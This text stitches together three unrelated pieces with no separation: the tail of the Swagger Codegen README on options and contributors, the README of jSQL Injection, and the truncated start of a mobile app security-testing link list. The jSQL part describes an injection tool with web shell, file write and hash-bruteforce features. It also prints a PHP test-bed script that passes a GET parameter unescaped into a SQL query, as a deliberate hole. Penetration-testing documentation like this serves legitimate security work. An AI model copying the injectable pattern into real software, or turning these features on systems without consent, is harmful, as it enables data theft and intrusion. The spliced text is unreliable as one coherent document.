`-DmodelTests=false` and `-DmodelDocs=false`. These options default to true and don't limit the generation of the feature options listed above (like `-Dapi`): ``` # generate only models (with tests and documentation) java -Dmodels {opts} # generate only models (with tests but no documentation) java -Dmodels -DmodelDocs=false {opts} # generate only User and Pet models (no tests and no documentation) java -Dmodels=User,Pet -DmodelTests=false {opts} # generate only apis (without tests) java -Dapis -DapiTests=false {opts} # generate only apis (modelTests option is ignored) java -Dapis -DmodelTests=false {opts} ``` When using selective generation, _only_ the templates needed for the specific generation will be used. ### Ignore file format Swagger codegen supports a `.swagger-codegen-ignore` file, similar to `.gitignore` or `.dockerignore` you're probably already familiar with. The ignore file allows for better control over overwriting existing files than the `--skip-overwrite` flag. With the ignore file, you can specify individual files or directories can be ignored. This can be useful, for example if you only want a subset of the generated code. Examples: ``` # Swagger Codegen Ignore # Lines beginning with a # are comments # This should match build.sh located anywhere. build.sh # Matches build.sh in the root /build.sh # Exclude all recursively docs/** # Explicitly allow files excluded by other rules !docs/UserApi.md # Recursively exclude directories named Api # You can't negate files below this directory. src/**/Api/ # When this file is nested under /Api (excluded above), # this rule is ignored because parent directory is excluded by previous rule. !src/**/PetApiTests.cs # Exclude a single, nested file explicitly src/IO.Swagger.Test/Model/AnimalFarmTests.cs ``` The `.swagger-codegen-ignore` file must exist in the root of the output directory. ### Customizing the generator There are different aspects of customizing the code generator beyond just creating or modifying templates. Each language has a supporting configuration file to handle different type mappings, etc: ``` $ ls -1 modules/swagger-codegen/src/main/java/io/swagger/codegen/languages/ AbstractJavaJAXRSServerCodegen.java AbstractTypeScriptClientCodegen.java AkkaScalaClientCodegen.java AndroidClientCodegen.java AspNet5ServerCodegen.java AspNetCoreServerCodegen.java AsyncScalaClientCodegen.java BashClientCodegen.java CSharpClientCodegen.java ClojureClientCodegen.java CsharpDotNet2ClientCodegen.java DartClientCodegen.java FlashClientCodegen.java FlaskConnexionCodegen.java GoClientCodegen.java HaskellServantCodegen.java JMeterCodegen.java JavaCXFServerCodegen.java JavaClientCodegen.java JavaInflectorServerCodegen.java JavaJerseyServerCodegen.java JavaResteasyServerCodegen.java JavascriptClientCodegen.java NodeJSServerCodegen.java NancyFXServerCodegen ObjcClientCodegen.java PerlClientCodegen.java PhpClientCodegen.java PythonClientCodegen.java Qt5CPPGenerator.java RubyClientCodegen.java ScalaClientCodegen.java ScalatraServerCodegen.java SilexServerCodegen.java SinatraServerCodegen.java SlimFrameworkServerCodegen.java SpringMVCServerCodegen.java StaticDocCodegen.java StaticHtmlGenerator.java SwaggerGenerator.java SwaggerYamlGenerator.java SwiftCodegen.java TizenClientCodegen.java TypeScriptAngularClientCodegen.java TypeScriptNodeClientCodegen.java ``` Each of these files creates reasonable defaults so you can get running quickly. But if you want to configure package names, prefixes, model folders, etc. you can use a json config file to pass the values. ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i http://petstore.swagger.io/v2/swagger.json \ -l java \ -o samples/client/petstore/java \ -c path/to/config.json ``` and `config.json` contains the following as an example: ``` { "apiPackage" : "petstore" } ``` Supported config options can be different per language. Running `config-help -l {lang}` will show available options. **These options are applied via configuration file (e.g. config.json) or by passing them with `-D{optionName}={optionValue}**. (If `-D{optionName}` does not work, please open a [ticket](https://github.com/swagger-api/swagger-codegen/issues/new) and we'll look into it) ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l java ``` Output ``` CONFIG OPTIONS modelPackage package for generated models apiPackage package for generated api classes sortParamsByRequiredFlag Sort method arguments to place required parameters before optional parameters. Default: true invokerPackage root package for generated code groupId groupId in generated pom.xml artifactId artifactId in generated pom.xml artifactVersion artifact version in generated pom.xml sourceFolder source folder for generated code localVariablePrefix prefix for generated code members and local variables serializableModel boolean - toggle "implements Serializable" for generated models library library template (sub-template) to use: jersey1 - HTTP client: Jersey client 1.18. JSON processing: Jackson 2.4.2 jersey2 - HTTP client: Jersey client 2.6 feign - HTTP client: Netflix Feign 8.1.1. JSON processing: Jackson 2.6.3 okhttp-gson (default) - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 retrofit - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 (Retrofit 1.9.0) retrofit2 - HTTP client: OkHttp 2.5.0. JSON processing: Gson 2.4 (Retrofit 2.0.0-beta2) ``` Your config file for Java can look like ```json { "groupId":"com.my.company", "artifactId":"MyClient", "artifactVersion":"1.2.0", "library":"feign" } ``` For all the unspecified options default values will be used. Another way to override default options is to extend the config class for the specific language. To change, for example, the prefix for the Objective-C generated files, simply subclass the ObjcClientCodegen.java: ```java package com.mycompany.swagger.codegen; import io.swagger.codegen.languages.*; public class MyObjcCodegen extends ObjcClientCodegen { static { PREFIX = "HELO"; } } ``` and specify the `classname` when running the generator: ``` -l com.mycompany.swagger.codegen.MyObjcCodegen ``` Your subclass will now be loaded and overrides the `PREFIX` value in the superclass. ### Bringing your own models Sometimes you don't want a model generated. In this case, you can simply specify an import mapping to tell the codegen what _not_ to create. When doing this, every location that references a specific model will refer back to your classes. Note, this may not apply to all languages... To specify an import mapping, use the `--import-mappings` argument and specify the model-to-import logic as such: ``` --import-mappings Pet=my.models.MyPet ``` Or for multiple mappings: ``` Pet=my.models.MyPet,Order=my.models.MyOrder ``` ### Validating your OpenAPI Spec You have options. The easiest is to use our [online validator](https://github.com/swagger-api/validator-badge) which not only will let you validate your spec, but with the debug flag, you can see what's wrong with your spec. For example: http://online.swagger.io/validator/debug?url=http://petstore.swagger.io/v2/swagger.json ### Generating dynamic html api documentation To do so, just use the `-l dynamic-html` flag when reading a spec file. This creates HTML documentation that is available as a single-page application with AJAX. To view the documentation: ``` cd samples/dynamic-html/ npm install node . ``` Which launches a node.js server so the AJAX calls have a place to go. ### Generating static html api documentation To do so, just use the `-l html` flag when reading a spec file. This creates a single, simple HTML file with embedded css so you can ship it as an email attachment, or load it from your filesystem: ``` cd samples/html/ open index.html ``` ### To build a server stub Please refer to https://github.com/swagger-api/swagger-codegen/wiki/Server-stub-generator-HOWTO for more information. ### To build the codegen library This will create the swagger-codegen library from source. ``` mvn package ``` Note! The templates are included in the library generated. If you want to modify the templates, you'll need to either repackage the library OR specify a path to your scripts ## Workflow integration You can use the [swagger-codegen-maven-plugin](modules/swagger-codegen-maven-plugin/README.md) for integrating with your workflow, and generating any codegen target. ## GitHub Integration To push the auto-generated SDK to GitHub, we provide `git_push.sh` to streamline the process. For example: 1) Create a new repository in GitHub (Ref: https://help.github.com/articles/creating-a-new-repository/) 2) Generate the SDK ``` java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \ -i modules/swagger-codegen/src/test/resources/2_0/petstore.json -l perl \ --git-user-id "wing328" \ --git-repo-id "petstore-perl" \ --release-note "Github integration demo" \ -o /var/tmp/perl/petstore ``` 3) Push the SDK to GitHub ``` cd /var/tmp/perl/petstore /bin/sh ./git_push.sh ``` ## Online generators One can also generate API client or server using the online generators (https://generator.swagger.io) For example, to generate Ruby API client, simply send the following HTTP request using curl: ``` curl -X POST -H "content-type:application/json" -d '{"swaggerUrl":"http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/ruby ``` Then you will receieve a JSON response with the URL to download the zipped code. To customize the SDK, you can `POST` to `https://generator.swagger.io/gen/clients/{language}` with the following HTTP body: ``` { "options": {}, "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" } ``` in which the `options` for a language can be obtained by submitting a `GET` request to `https://generator.swagger.io/api/gen/clients/{language}`: For example, `curl https://generator.swagger.io/api/gen/clients/python` returns ``` { "packageName":{ "opt":"packageName", "description":"python package name (convention: snake_case).", "type":"string", "default":"swagger_client" }, "packageVersion":{ "opt":"packageVersion", "description":"python package version.", "type":"string", "default":"1.0.0" }, "sortParamsByRequiredFlag":{ "opt":"sortParamsByRequiredFlag", "description":"Sort method arguments to place required parameters before optional parameters.", "type":"boolean", "default":"true" } } ``` To set package name to `pet_store`, the HTTP body of the request is as follows: ``` { "options": { "packageName": "pet_store" }, "swaggerUrl": "http://petstore.swagger.io/v2/swagger.json" } ``` and here is the curl command: ``` curl -H "Content-type: application/json" -X POST -d '{"options": {"packageName": "pet_store"},"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/python ``` Guidelines for Contribution --------------------------- Please refer to this [page](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) Companies/Projects using Swagger Codegen ---------------------------------------- Here are some companies/projects using Swagger Codegen in production. To add your company/project to the list, please visit [README.md](https://github.com/swagger-api/swagger-codegen/blob/master/README.md) and click on the icon to edit the page. - [Activehours](https://www.activehours.com/) - [Acunetix](https://www.acunetix.com/) - [Atlassian](https://www.atlassian.com/) - [Autodesk](http://www.autodesk.com/) - [Avenida Compras S.A.](https://www.avenida.com.ar) - [AYLIEN](http://aylien.com/) - [Balance Internet](https://www.balanceinternet.com.au/) - [beemo](http://www.beemo.eu) - [bitly](https://bitly.com) - [Bufferfly Network](https://www.butterflynetinc.com/) - [Cachet Financial](http://www.cachetfinancial.com/) - [carpolo](http://www.carpolo.co/) - [CloudBoost](https://www.CloudBoost.io/) - [Conplement](http://www.conplement.de/) - [Cummins] (http://www.cummins.com/) - [Cupix](http://www.cupix.com) - [DBBest Technologies](https://www.dbbest.com) - [DecentFoX](http://decentfox.com/) - [DocuSign](https://www.docusign.com) - [Ergon](http://www.ergon.ch/) - [EMC](https://www.emc.com/) - [eureka](http://eure.jp/) - [everystory.us](http://everystory.us) - [Expected Behavior](http://www.expectedbehavior.com/) - [Fastly](https://www.fastly.com/) - [Flat](https://flat.io) - [Finder](http://en.finder.pl/) - [FH Münster - University of Applied Sciences](http://www.fh-muenster.de) - [Fotition](https://www.fotition.com/) - [Gear Zero Network](https://www.gearzero.ca) - [Germin8](http://www.germin8.com) - [goTransverse](http://www.gotransverse.com/api) - [GraphHopper](https://graphhopper.com/) - [Gravitate Solutions](http://gravitatesolutions.com/) - [Hewlett Packard Enterprise](https://hpe.com) - [High Technologies Center](http://htc-cs.com) - [IMS Health](http://www.imshealth.com/en/solution-areas/technology-and-applications) - [Intent HQ](http://www.intenthq.com) - [Interactive Intelligence](http://developer.mypurecloud.com/) - [Kabuku](http://www.kabuku.co.jp/en) - [Kurio](https://kurio.co.id) - [Kuroi](http://kuroiwebdesign.com/) - [Kuary](https://kuary.com/) - [Kubernetes](https://kubernetes.io/) - [LANDR Audio](https://www.landr.com/) - [Lascaux](http://www.lascaux.it/) - [Leica Geosystems AG](http://leica-geosystems.com) - [LiveAgent](https://www.ladesk.com/) - [LXL Tech](http://lxltech.com) - [MailMojo](https://mailmojo.no/) - [Mindera](http://mindera.com/) - [Mporium](http://mporium.com/) - [Neverfail](https://neverfail.com/) - [nViso](http://www.nviso.ch/) - [Okiok](https://www.okiok.com) - [Onedata](http://onedata.org) - [OrderCloud.io](http://ordercloud.io) - [OSDN](https://osdn.jp) - [PagerDuty](https://www.pagerduty.com) - [PagerTree](https://pagertree.com) - [Pepipost](https://www.pepipost.com) - [Plexxi](http://www.plexxi.com) - [Pixoneye](http://www.pixoneye.com/) - [PostAffiliatePro](https://www.postaffiliatepro.com/) - [Prill Tecnologia](http://www.prill.com.br) - [QAdept](http://qadept.com/) - [QuantiModo](https://quantimo.do/) - [QuickBlox](https://quickblox.com/) - [Rapid7](https://rapid7.com/) - [Reload! A/S](https://reload.dk/) - [REstore](https://www.restore.eu) - [Revault Sàrl](http://revault.ch) - [Riffyn](https://riffyn.com) - [Royal Bank of Canada (RBC)](http://www.rbc.com/canada.html) - [Saritasa](https://www.saritasa.com/) - [SCOOP Software GmbH](http://www.scoop-software.de) - [Shine Solutions](https://shinesolutions.com/) - [Simpfony](https://www.simpfony.com/) - [Skurt](http://www.skurt.com) - [Slamby](https://www.slamby.com/) - [SmartRecruiters](https://www.smartrecruiters.com/) - [snapCX](https://snapcx.io) - [SPINEN](http://www.spinen.com) - [SRC](https://www.src.si/) - [StyleRecipe](http://stylerecipe.co.jp) - [Svenska Spel AB](https://www.svenskaspel.se/) - [TaskData](http://www.taskdata.com/) - [ThoughtWorks](https://www.thoughtworks.com) - [Upwork](http://upwork.com/) - [uShip](https://www.uship.com/) - [VMware](https://vmware.com/) - [W.UP](http://wup.hu/?siteLang=en) - [Wealthfront](https://www.wealthfront.com/) - [Webever GmbH](https://www.webever.de/) - [WEXO A/S](https://www.wexo.dk/) - [Zalando](https://tech.zalando.com) - [ZEEF.com](https://zeef.com/) # Swagger Codegen Core Team Swagger Codegen core team members are contributors who have been making significant contributions (review issues, fix bugs, make enhancements, etc) to the project on a regular basis. ## API Clients | Languages | Core Team (join date) | |:-------------|:-------------| | ActionScript | | | C++ | | | C# | @jimschubert (2016/05/01) | | | Clojure | @xhh (2016/05/01) | | Dart | | | Groovy | | | Go | @guohuang (2016/05/01) @neilotoole (2016/05/01) | | Java | @cbornet (2016/05/01) @xhh (2016/05/01) @epaul (2016/06/04) | | Java (Spring Cloud) | @cbornet (2016/07/19) | | NodeJS/Javascript | @xhh (2016/05/01) | | ObjC | @mateuszmackowiak (2016/05/09) | | Perl | @wing328 (2016/05/01) | | PHP | @arnested (2016/05/01) | | Python | @scottrw93 (2016/05/01) | | Ruby | @wing328 (2016/05/01) @zlx (2016/05/22) | | Scala | | | Swift | @jaz-ah (2016/05/01) @Edubits (2016/05/01) | | TypeScript (Node) | @Vrolijkx (2016/05/01) | | TypeScript (Angular1) | @Vrolijkx (2016/05/01) | | TypeScript (Angular2) | @Vrolijkx (2016/05/01) | | TypeScript (Fetch) | | ## Server Stubs | Languages | Core Team (date joined) | |:------------- |:-------------| | C# ASP.NET5 | @jimschubert (2016/05/01) | | Go Server | @guohuang (2016/06/13) | | Haskell Servant | | | Java Spring Boot | @cbornet (2016/07/19) | | Java Spring MVC | @kolyjjj (2016/05/01) @cbornet (2016/07/19) | | Java JAX-RS | | | NancyFX | | | NodeJS | @kolyjjj (2016/05/01) | | PHP Lumen | @abcsum (2016/05/01) | | PHP Silex | | | PHP Slim | | | Python Flask | | | Ruby Sinatra | @wing328 (2016/05/01) | | | Scala Scalatra | | | | Scala Finch | @jimschubert (2017/01/28) | ## Template Creator Here is a list of template creators: * API Clients: * Akka-Scala: @cchafer * Bash: @bkryza * C++ REST: @Danielku15 * C# (.NET 2.0): @who * Clojure: @xhh * Dart: @yissachar * Elixir: @niku * Groovy: @victorgit * Go: @wing328 * Java (Feign): @davidkiss * Java (Retrofit): @0legg * Java (Retrofi2): @emilianobonassi * Java (Jersey2): @xhh * Java (okhttp-gson): @xhh * Javascript/NodeJS: @jfiala * Javascript (Closure-annotated Angular) @achew22 * JMeter @davidkiss * Perl: @wing328 * Swift: @tkqubo * Swift 3: @hexelon * TypeScript (Node): @mhardorf * TypeScript (Angular1): @mhardorf * TypeScript (Fetch): @leonyu * TypeScript (Angular2): @roni-frantchi * Server Stubs * C# ASP.NET5: @jimschubert * C# NancyFX: @mstefaniuk * Erlang Server: @galaxie * Go Server: @guohuang * Haskell Servant: @algas * Java MSF4J: @sanjeewa-malalgoda * Java Spring Boot: @diyfr * Java Undertow: @stevehu * JAX-RS RestEasy: @chameleon82 * JAX-RS CXF: @hiveship * JAX-RS CXF (CDI): @nickcmaynard * PHP Lumen: @abcsum * PHP Slim: @jfastnacht * PHP Zend Expressive (with Path Handler): @Articus * Ruby on Rails 5: @zlx * Scala Finch: @jimschubert * Documentation * HTML Doc 2: @jhitchcock * Confluence Wiki: @jhitchcock ## How to join the core team Here are the requirements to become a core team member: - rank within top 50 in https://github.com/swagger-api/swagger-codegen/graphs/contributors - to contribute, here are some good [starting points](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22) - regular contributions to the project - about 3 hours per week - for contribution, it can be addressing issues, reviewing PRs submitted by others, submitting PR to fix bugs or make enhancements, etc To join the core team, please reach out to [email protected] (@wing328) for more information. To become a Template Creator, simply submit a PR for new API client (e.g. Rust, Elixir) or server stub (e.g. Ruby Grape) generator. # Swagger Codegen Evangelist Swagger Codegen Evangelist shoulders one or more of the following responsibilities: - publishes articles on the benefit of Swagger Codegen - organizes local Meetups - presents the benefits of Swagger Codegen in local Meetups or conferences - actively answers questions from others in [Github](https://github.com/swagger-api/swagger-codegen/issues), [StackOverflow](stackoverflow.com/search?q=%5Bswagger%5D) - submits PRs to improve Swagger Codegen - reviews PRs submitted by the others - ranks within top 100 in the [contributor list](https://github.com/swagger-api/swagger-codegen/graphs/contributors) If you want to be a Swagger Codegen Evangelist, please kindly apply by sending an email to [email protected] (@wing328) ### List of Swagger Codegen Evangelists - Cliffano Subagio (@cliffano from Australia joined on Dec 9, 2016) - [Building An AEM API Clients Ecosystem](http://www.slideshare.net/cliffano/building-an-aem-api-clients-ecosystem) - [Adobe Marketing Cloud Community Expo](http://blog.cliffano.com/2016/11/10/adobe-marketing-cloud-community-expo/) # License information on Generated Code The Swagger Codegen project is intended as a benefit for users of the Swagger / Open API Specification. The project itself has the [License](#license) as specified. In addition, please understand the following points: * The templates included with this project are subject to the [License](#license). * Generated code is intentionally _not_ subject to the parent project license When code is generated from this project, it shall be considered **AS IS** and owned by the user of the software. There are no warranties--expressed or implied--for generated code. You can do what you wish with it, and once generated, the code is your responsibility and subject to the licensing terms that you deem appropriate. License ------- Copyright 2017 SmartBear Software Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at [apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0) Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --- <img src="http://swagger.io/wp-content/uploads/2016/02/logo.jpg"/>
## Description **jSQL Injection** is a lightweight application used to find database information from a server. It's **free**, **open source** and **cross-platform** for Windows, Linux and Mac and it works with Java from version 11 to 20. ![Kali Linux logo](https://github.com/ron190/jsql-injection/raw/master/web/images/kali_favicon.png "Kali Linux logo") jSQL Injection is also part of the official penetration testing distribution [Kali Linux](http://www.kali.org/) and is included in various other distributions like [Blackbuntu](https://blackbuntu.org), [Pentest Box](https://pentestbox.com/), [Parrot Security OS](https://www.parrotsec.org), [ArchStrike](https://archstrike.org/) and [BlackArch Linux](http://www.blackarch.org/). [![Twitter](https://img.shields.io/twitter/follow/ron190jsql.svg?style=social&label=ron190 "Developer Twitter account")](https://twitter.com/ron190jsql)<br> [![Java](https://img.shields.io/badge/java-11%20to%2020-orange?logo=java "Version range compatibility")](http://www.oracle.com/technetwork/java/javase/downloads/) [![JUnit](https://img.shields.io/badge/junit-5-50940f "Tests")](http://junit.org) [![Maven](https://img.shields.io/badge/maven-3.6-a2265a "Build")](https://maven.apache.org/) [![License](https://img.shields.io/github/license/ron190/jsql-injection "License")](http://www.gnu.org/licenses/old-licenses/gpl-2.0.html)<br> [![GitHub](https://img.shields.io/badge/build-blue?logo=github "Github Actions status")](https://github.com/ron190/jsql-injection/actions) [![Codecov](https://img.shields.io/codecov/c/github/ron190/jsql-injection?label=coverage&logo=codecov "Codecov test coverage")](https://codecov.io/gh/ron190/jsql-injection) [![Codacy](https://img.shields.io/codacy/grade/e7ccb247f9b74d489a1fa9f9483c978f?label=quality&logo=codacy "Codacy code quality")](https://app.codacy.com/gh/ron190/jsql-injection/dashboard) [![Snyk](https://img.shields.io/badge/build-monitored-8A2BE2?logo=snyk&label=security "Snyk code vulnerability")](#)<br> [![Sonar](https://img.shields.io/sonar/violations/ron190:jsql-injection?format=long&label=issues&logo=sonarqube&server=https%3A%2F%2Fsonarcloud.io "Sonar code issues")](https://sonarcloud.io/dashboard?id=ron190%3Ajsql-injection) ## Features - Automatic injection of 33 database engines: Access, Altibase, C-treeACE, CockroachDB, CUBRID, DB2, Derby, Exasol, Firebird, FrontBase, H2, Hana, HSQLDB, Informix, Ingres, InterSystems-IRIS, MaxDB, Mckoi, MemSQL, MimerSQL, MonetDB, MySQL, Neo4j, Netezza, NuoDB, Oracle, PostgreSQL, Presto, SQLite, SQL Server, Sybase, Teradata and Vertica - Multiple injection strategies: Normal, Stacked, Error, Blind and Time - Parallel bitwise Boolean Blind and Time strategies - Various injection processes: Default, Zip, Dios - Database fingerprint: Basic error, Order By error, Boolean single query - Script sandboxes for SQL and tampering - Inject multiple targets - Read and write files using injection - Create and display Web shell and SQL shell - Bruteforce password hash - Search for admin pages - Hash, encode and decode text - Authenticate using Basic, Digest, NTLM and Kerberos - Proxy connection on HTTP, SOCKS4 and SOCKS5 ## Installation [[jsql-injection-v0.90.jar](https://github.com/ron190/jsql-injection/releases/download/v0.90/jsql-injection-v0.90.jar)] Install [Java](http://java.com) 11 or up to 20, then download the latest [release](https://github.com/ron190/jsql-injection/releases/) and double-click on the file `jsql-injection-v0.90.jar` to launch the software.<br> You can also type `java -jar jsql-injection-v0.90.jar` in your terminal to start the program.<br> If you are using Kali Linux then get the latest release using command `sudo apt-get -f install jsql`, or make a system full upgrade with `apt update` then `apt full-upgrade`.<br> To run older version on Java 16+ use `java --illegal-access=warn --add-exports java.base/sun.net.www.protocol.http=ALL-UNNAMED -jar jsql-injection-v0.90.jar`. ## Continuous integration This software is developed using open source libraries like [Spring](https://spring.io), [Spock](http://spockframework.org) and [Hibernate](https://hibernate.org) and is tested using continuous integration platform Github Actions.<br> Non regression tests are run against dockerized and in memory databases and GUI is tested on VNC screen on the CI platform, then quality checks are stored on code quality platform. ```mermaid --- title: Architecture, covered by DevOps pipeline --- graph junit-test(JUnit Tests) subgraph "jSQL" gui(GUI) inject-model("💉Model") end subgraph Spring admin-page([/admin-page]) spring-apis([/api]) end subgraph Memory memory-other[(SQLite\nH2\nHSQLDB\nDerby)] end subgraph Docker direction TB subgraph System direction TB mysql[(MySQL)] file.txt(["file.txt"]) shell(["shell.php"]) end docker-other[(SQL Server\nPostgreSQL\nCubrid\nNeo4j\nDb2)] end junit-test --> inject-model & gui inject-model -. "call" .-> admin-page inject-model -- inject --> spring-apis spring-apis --> Docker spring-apis --> Memory mysql -. read .-> file.txt mysql -. create .-> shell ``` ## [[Test-bed scripts for Spring](https://github.com/ron190/jsql-injection/tree/master/model/src/test/java/spring/rest)] See test scripts used for CI integration. ## [[Test-bed scripts for PHP](https://github.com/ron190/jsql-injection/tree/master/web/test-bed)] Use the sample PHP scripts to test injection on your local environment. First install a development environment like [EasyPHP](http://www.easyphp.org), then download the [test-bed PHP scripts](https://github.com/ron190/jsql-injection/tree/master/web/test-bed) and move them into `www/`. ```php <?php # http://127.0.0.1/mysql/strategy/get-normal.php?id=0 $link = mysqli_connect('localhost', 'root', '', 'my_database'); $result = $link->query("SELECT col1, col2 FROM my_table where id=$_GET[id]"); while ($row = $result->fetch_array($result, MYSQLI_NUM)) echo join(',', $row); ``` ## Screenshots [![Database](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/database-mini.png "Database")](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/database.png) [![SQL Engine](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.82/sqlengine-mini.png "SQL Engine")](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.82/sqlengine.png) [![Tamper](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.82/tamper-mini.png "Tamper")](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.82/tamper.png) [![Batch scan](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/scan-mini.png "Batch scan")](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/scan.png) [![Admin page](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/admin-mini.png "Admin page")](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/admin.png) [![Web shell](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/webshell-mini.png "Web shell")](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/webshell.png) [![SQL shell](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/sqlshell-mini.png "SQL shell")](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/sqlshell.png) [![File](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/file-mini.png "File")](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/file.png) [![Upload](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/upload-mini.png "Upload")](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/upload.png) [![Bruteforce](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/bruter-mini.png "Bruteforce")](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/bruter.png) [![Coder](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/coder-mini.png "Coder")](https://github.com/ron190/jsql-injection/raw/master/web/images/v0.75/coder.png) ## Informations <details> <summary>Change log</summary> **v0.84-85** `Upgrade to Java 11, compatible up to Java 17` **v0.83** `Modes Zip and Dios, Insertion char and db fingerprinting, 33 dbs including Altibase C-treeACE Exasol FrontBase InterSystems-IRIS MemSQL MimerSQL MonetDB Netezza and Presto` **v0.82** `Tampering options, Refactoring for Cloud and multithreading` **v0.81** `Test all parameters including JSON, Parse forms and Csrf tokens, 23 dbs including CockroachDB Mckoi Neo4j NuoDB Hana and Vertica, Translation complete: Russian, Chinese` **v0.79** `Error Strategies for MySQL and PostgreSQL compatible with Order/Group By, Wider range of Characters Insertion including multibyte %bf` **v0.78** `SQL Engine, MySQL Error strategy: DOUBLE, Translations: es pt de it nl id, 18 Database flavors including Access` **v0.76** `Translation: cz, 17 dbs including SQLite` **v0.75** `URI injection point, Source code mavenification, Upgrade to Java 7` **v0.73** `Authentication: Basic Digest Negotiate NTLM and Kerberos, Database flavor selection` **v0.7** `Scan multiple URLs, Github Issue reporter, 16 dbs including Cubrid Derby H2 HSQLDB MariaDB and Teradata` **alpha-v0.6** `Speed x2: No more hex encoding, 10 dbs including Oracle SQLServer PostgreSQL DB2 Firebird Informix Ingres MaxDb and Sybase, JUnit tests, Log4j, GUI translation` **0.5** `SQL Shell, File Uploader` **0.4** `Admin page finder, Bruteforce hashes like MD5 and MySQL, Encode and decode string with methods like Base64, Hex and MD5` **0.3** `File injection, Web Shell with integrated CLI, Persistence of application parameters, Update checker` **0.2** `Strategy Time, Multi-thread control: Start Pause Resume and Stop, Log URL calls` **0.0-0.1** `Method GET POST Header and Cookie, Strategies Normal Error and Blind, Best strategy selection, Progression bars, Simple evasion, Proxy settings, MySQL only` </details> <details> <summary>Roadmap</summary> ## [[Taskboard](https://github.com/ron190/jsql-injection/projects)] ``` - New manager: create auth token for Basic, Digest, Negotiate, NTLM - Full Path Disclosure - WAF fingerprinting - Inject user defined query - Inject range of rows - Routed query strategy - Connect to Digest/Kerberos API with HttpClient - Replace Docker with Kubernetes - Database fingerprinting: Boolean single query ``` ## In progress ``` - Implement DNS/HTTP out-of-band algorithm - Inject each Cookie parameters - Rows custom load ``` ## Since latest release ``` - Testing Oracle DNS/HTTP out-of-band - Testing PostgreSQL DNS out-of-band - Testing Websocket Basic/STOMP - Testing GraphQL - Testing Kerberos ``` </details> ## Disclaimer Attacking web-server is illegal without prior mutual consent. The end user is responsible and obeys all applicable laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
Resources for Mobile Application Testing # Android ### Blogs, Papers, How To's * [Evernote: Universal-XSS, theft of all cookies from all sites, and more](https://blog.oversecured.com/Evernote-Universal-XSS-theft-of-all-cookies-from-all-sites-and-more/) * [Interception of Android implicit intents](https://blog.oversecured.com/Interception-of-Android-implicit-intents/) * [TikTok: three persistent arbitrary code executions and one theft of arbitrary files](https://blog.oversecured.com/Oversecured-detects-dangerous-vulnerabilities-in-the-TikTok-Android-app/) * [Persistent arbitrary code execution in Android's Google Play Core Library: details, explanation and the PoC - CVE-2020-8913](https://blog.oversecured.com/Oversecured-automatically-discovers-persistent-code-execution-in-the-Google-Play-Core-Library/) * [Android: Access to app protected components](https://blog.oversecured.com/Android-Access-to-app-protected-components/) * [Android: arbitrary code execution via third-party package contexts](https://blog.oversecured.com/Android-arbitrary-code-execution-via-third-party-package-contexts/) * [An Android Hacking Primer](https://medium.com/swlh/an-android-hacking-primer-3390fef4e6a0) * [Secure an Android Device](https://source.android.com/security) * [Security tips](https://developer.android.com/training/articles/security-tips) * [OWASP Mobile Security Testing Guide](https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide) * [Security Testing for Android Cross Platform Application](https://3xpl01tc0d3r.blogspot.com/2019/09/security-testing-for-android-app-part1.html) * [Dive deep into Android Application Security](https://blog.0daylabs.com/2019/09/18/deep-dive-into-Android-security/) * [Pentesting Android Apps Using Frida](https://www.notsosecure.com/pentesting-android-apps-using-frida/) * [Mobile Security Testing Guide](https://mobile-security.gitbook.io/mobile-security-testing-guide/) * [Mobile Application Penetration Testing Cheat Sheet](https://github.com/sh4hin/MobileApp-Pentest-Cheatsheet) * [Android Applications Reversing 101](https://www.evilsocket.net/2017/04/27/Android-Applications-Reversing-101/#.WQND0G3TTOM.reddit) * [Android Security Guidelines](https://developer.box.com/en/guides/security/) * [Android WebView Vulnerabilities](https://pentestlab.blog/2017/02/12/android-webview-vulnerabilities/) * [OWASP Mobile Top 10](https://www.owasp.org/index.php/OWASP_Mobile_Top_10) * [Practical Android Phone Forensics](https://resources.infosecinstitute.com/practical-android-phone-forensics/) * [Mobile Reverse Engineering Unleashed](http://www.vantagepoint.sg/blog/83-mobile-reverse-engineering-unleashed) * [Android Root Detection Bypass Using Objection and Frida Scripts](https://medium.com/@GowthamR1/android-root-detection-bypass-using-objection-and-frida-scripts-d681d30659a7) * [quark-engine - An Obfuscation-Neglect Android Malware Scoring 